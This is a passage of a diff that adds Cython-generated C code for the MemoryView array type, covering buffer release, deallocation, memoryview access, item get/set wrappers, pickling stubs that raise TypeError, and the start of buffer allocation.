*)__pyx_v_self); + + /* "View.MemoryView":182 + * _allocate_buffer(self) + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.array.__getbuffer__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + if (__pyx_v_info->obj != NULL) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + goto __pyx_L2; + __pyx_L0:; + if (__pyx_v_info->obj == Py_None) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + __pyx_L2:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":210 + * info.obj = self + * + * def __dealloc__(array self): # <<<<<<<<<<<<<< + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + */ + +/* Python wrapper */ +static void __pyx_array___dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_array___dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_array___pyx_pf_15View_dot_MemoryView_5array_4__dealloc__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_array___pyx_pf_15View_dot_MemoryView_5array_4__dealloc__(struct __pyx_array_obj *__pyx_v_self) { + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "View.MemoryView":211 + * + * def __dealloc__(array self): + * if self.callback_free_data != NULL: # <<<<<<<<<<<<<< + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + */ + __pyx_t_1 = (__pyx_v_self->callback_free_data != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":212 + * def __dealloc__(array self): + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) # <<<<<<<<<<<<<< + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: + */ + __pyx_v_self->callback_free_data(__pyx_v_self->data); + + /* "View.MemoryView":211 + * + * def __dealloc__(array self): + * if self.callback_free_data != NULL: # <<<<<<<<<<<<<< + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":213 + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: # <<<<<<<<<<<<<< + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + */ + if (__pyx_v_self->free_data) { + } else { + __pyx_t_1 = __pyx_v_self->free_data; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_2 = (__pyx_v_self->data != NULL); + __pyx_t_1 = __pyx_t_2; + __pyx_L4_bool_binop_done:; + if (__pyx_t_1) { + + /* "View.MemoryView":214 + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) + */ + if (__pyx_v_self->dtype_is_object) { + + /* "View.MemoryView":215 + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) # <<<<<<<<<<<<<< + * free(self.data) + * PyObject_Free(self._shape) + */ + __pyx_memoryview_refcount_objects_in_slice(__pyx_v_self->data, __pyx_v_self->_shape, __pyx_v_self->_strides, __pyx_v_self->ndim, 0); + + /* "View.MemoryView":214 + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) + */ + } + + /* "View.MemoryView":216 + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) # <<<<<<<<<<<<<< + * PyObject_Free(self._shape) + * + */ + free(__pyx_v_self->data); + + /* "View.MemoryView":213 + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: # <<<<<<<<<<<<<< + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + */ + } + __pyx_L3:; + + /* "View.MemoryView":217 + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) + * PyObject_Free(self._shape) # <<<<<<<<<<<<<< + * + * @property + */ + PyObject_Free(__pyx_v_self->_shape); + + /* "View.MemoryView":210 + * info.obj = self + * + * def __dealloc__(array self): # <<<<<<<<<<<<<< + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":219 + * PyObject_Free(self._shape) + * + * @property # <<<<<<<<<<<<<< + * def memview(self): + * return self.get_memview() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_5array_7memview_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_5array_7memview_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_5array_7memview___get__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_5array_7memview___get__(struct __pyx_array_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":221 + * @property + * def memview(self): + * return self.get_memview() # <<<<<<<<<<<<<< + * + * @cname('get_memview') + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = ((struct __pyx_vtabstruct_array *)__pyx_v_self->__pyx_vtab)->get_memview(__pyx_v_self); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 221, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":219 + * PyObject_Free(self._shape) + * + * @property # <<<<<<<<<<<<<< + * def memview(self): + * return self.get_memview() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.array.memview.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":224 + * + * @cname('get_memview') + * cdef get_memview(self): # <<<<<<<<<<<<<< + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE + * return memoryview(self, flags, self.dtype_is_object) + */ + +static PyObject *__pyx_array_get_memview(struct __pyx_array_obj *__pyx_v_self) { + int __pyx_v_flags; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_memview", 0); + + /* "View.MemoryView":225 + * @cname('get_memview') + * cdef get_memview(self): + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE # <<<<<<<<<<<<<< + * return memoryview(self, flags, self.dtype_is_object) + * + */ + __pyx_v_flags = ((PyBUF_ANY_CONTIGUOUS | PyBUF_FORMAT) | PyBUF_WRITABLE); + + /* "View.MemoryView":226 + * cdef get_memview(self): + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE + * return memoryview(self, flags, self.dtype_is_object) # <<<<<<<<<<<<<< + * + * def __len__(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_flags); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_v_self->dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF((PyObject *)__pyx_v_self); + __Pyx_GIVEREF((PyObject *)__pyx_v_self); + PyTuple_SET_ITEM(__pyx_t_3, 0, ((PyObject *)__pyx_v_self)); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_Call(((PyObject *)__pyx_memoryview_type), __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":224 + * + * @cname('get_memview') + * cdef get_memview(self): # <<<<<<<<<<<<<< + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE + * return memoryview(self, flags, self.dtype_is_object) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.array.get_memview", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":228 + * return memoryview(self, flags, self.dtype_is_object) + * + * def __len__(self): # <<<<<<<<<<<<<< + * return self._shape[0] + * + */ + +/* Python wrapper */ +static Py_ssize_t __pyx_array___len__(PyObject *__pyx_v_self); /*proto*/ +static Py_ssize_t __pyx_array___len__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__len__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_6__len__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static Py_ssize_t __pyx_array___pyx_pf_15View_dot_MemoryView_5array_6__len__(struct __pyx_array_obj *__pyx_v_self) { + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__len__", 0); + + /* "View.MemoryView":229 + * + * def __len__(self): + * return self._shape[0] # <<<<<<<<<<<<<< + * + * def __getattr__(self, attr): + */ + __pyx_r = (__pyx_v_self->_shape[0]); + goto __pyx_L0; + + /* "View.MemoryView":228 + * return memoryview(self, flags, self.dtype_is_object) + * + * def __len__(self): # <<<<<<<<<<<<<< + * return self._shape[0] + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":231 + * return self._shape[0] + * + * def __getattr__(self, attr): # <<<<<<<<<<<<<< + * return getattr(self.memview, attr) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_array___getattr__(PyObject *__pyx_v_self, PyObject *__pyx_v_attr); /*proto*/ +static PyObject *__pyx_array___getattr__(PyObject *__pyx_v_self, PyObject *__pyx_v_attr) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getattr__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_8__getattr__(((struct __pyx_array_obj *)__pyx_v_self), ((PyObject *)__pyx_v_attr)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_8__getattr__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_attr) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getattr__", 0); + + /* "View.MemoryView":232 + * + * def __getattr__(self, attr): + * return getattr(self.memview, attr) # <<<<<<<<<<<<<< + * + * def __getitem__(self, item): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_memview); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_GetAttr(__pyx_t_1, __pyx_v_attr); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":231 + * return self._shape[0] + * + * def __getattr__(self, attr): # <<<<<<<<<<<<<< + * return getattr(self.memview, attr) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.array.__getattr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":234 + * return getattr(self.memview, attr) + * + * def __getitem__(self, item): # <<<<<<<<<<<<<< + * return self.memview[item] + * + */ + +/* Python wrapper */ +static PyObject *__pyx_array___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item); /*proto*/ +static PyObject *__pyx_array___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getitem__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_10__getitem__(((struct __pyx_array_obj *)__pyx_v_self), ((PyObject *)__pyx_v_item)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_10__getitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getitem__", 0); + + /* "View.MemoryView":235 + * + * def __getitem__(self, item): + * return self.memview[item] # <<<<<<<<<<<<<< + * + * def __setitem__(self, item, value): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_memview); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 235, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_t_1, __pyx_v_item); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 235, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":234 + * return getattr(self.memview, attr) + * + * def __getitem__(self, item): # <<<<<<<<<<<<<< + * return self.memview[item] + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.array.__getitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":237 + * return self.memview[item] + * + * def __setitem__(self, item, value): # <<<<<<<<<<<<<< + * self.memview[item] = value + * + */ + +/* Python wrapper */ +static int __pyx_array___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_array___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setitem__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_12__setitem__(((struct __pyx_array_obj *)__pyx_v_self), ((PyObject *)__pyx_v_item), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_12__setitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setitem__", 0); + + /* "View.MemoryView":238 + * + * def __setitem__(self, item, value): + * self.memview[item] = value # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_memview); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 238, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (unlikely((PyObject_SetItem(__pyx_t_1, __pyx_v_item, __pyx_v_value) < 0))) __PYX_ERR(1, 238, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "View.MemoryView":237 + * return self.memview[item] + * + * def __setitem__(self, item, value): # <<<<<<<<<<<<<< + * self.memview[item] = value + * + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.array.__setitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_array_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_array_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_array___reduce_cython__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_array___reduce_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.array.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_array_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_array_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.array.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_array_2__setstate_cython__(((struct __pyx_array_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_array_2__setstate_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.array.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":248 + * + * @cname("__pyx_array_allocate_buffer") + * cdef int _allocate_buffer(array self) except -1: # <<<<<<<<<<<<<< + * + * + */ + +static int __pyx_array_allocate_buffer(struct __pyx_array_obj *__pyx_v_self) { + Py_ssize_t __pyx_v_i; + PyObject **__pyx_v_p; + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + Py_ssize_t __pyx_t_2; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_allocate_buffer", 0); + + /* "View.MemoryView":254 + * cdef PyObject **p + * + * self.free_data = True # <<<<<<<<<<<<<< + * self.data = malloc(self.len) + * if not self.data: + */ + __pyx_v_self->free_data = 1; + + /* "View.MemoryView":255 + * + * self.free_data = True + * self.data = malloc(self.len) # <<<<<<<<<<<<<< + * if not self.data: + * raise MemoryError, "unable to allocate array data." + */ + __pyx_v_self->data = ((char *)malloc(__pyx_v_self->len)); + + /* "View.MemoryView":256 + * self.free_data = True + * self.data = malloc(self.len) + * if not self.data: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate array data." + * + */ + __pyx_t_1 = (!(__pyx_v_self->data != 0)); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":257 + * self.data = malloc(self.len) + * if not self.data: + * raise MemoryError, "unable to allocate array data." # <<<<<<<<<<<<<< + * + * if self.dtype_is_object: + */ + __Pyx_Raise(__pyx_builtin_MemoryError, __pyx_kp_s_unable_to_allocate_array_data, 0, 0); + __PYX_ERR(1, 257, __pyx_L1_error) + + /* "View.MemoryView":256 + * self.free_data = True + * self.data = malloc(self.len) + * if not self.data: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate array data." + * + */ + } + + /* "View.MemoryView":259 + * raise MemoryError, "unable to allocate array data." + 